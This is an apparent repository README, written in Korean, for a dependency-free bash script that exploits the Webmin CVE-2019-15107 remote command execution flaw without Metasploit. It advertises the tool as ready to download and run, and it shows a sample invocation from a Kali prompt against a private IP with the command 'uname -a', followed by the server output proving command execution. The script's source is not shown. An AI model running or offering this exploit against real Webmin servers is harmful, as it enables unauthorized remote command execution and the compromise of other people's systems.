
Bash 스크립트로 Metasploit 없이 Webmin의 CVE-2019-15107을 익스플로잇합니다. 취약한 대상에서 종속성 없이 원격 명령을 실행합니다.
이 저장소에는 metasploit을 사용하지 않고 CVE-2019-15107을 익스플로잇하기 위한 작은 bash 스크립트가 포함되어 있습니다. 사용법은 매우 간단합니다. 다운로드하여 실행하기만 하면 되며, 종속성은 없습니다.
root@kali:~# ./webmin-CVE-2019-15107.sh 10.10.73.185 'uname -a'
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.Linux source 4.15.0-108-generic #109-Ubuntu SMP Fri Jun 19 11:33:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
</p>
root@kali:~#```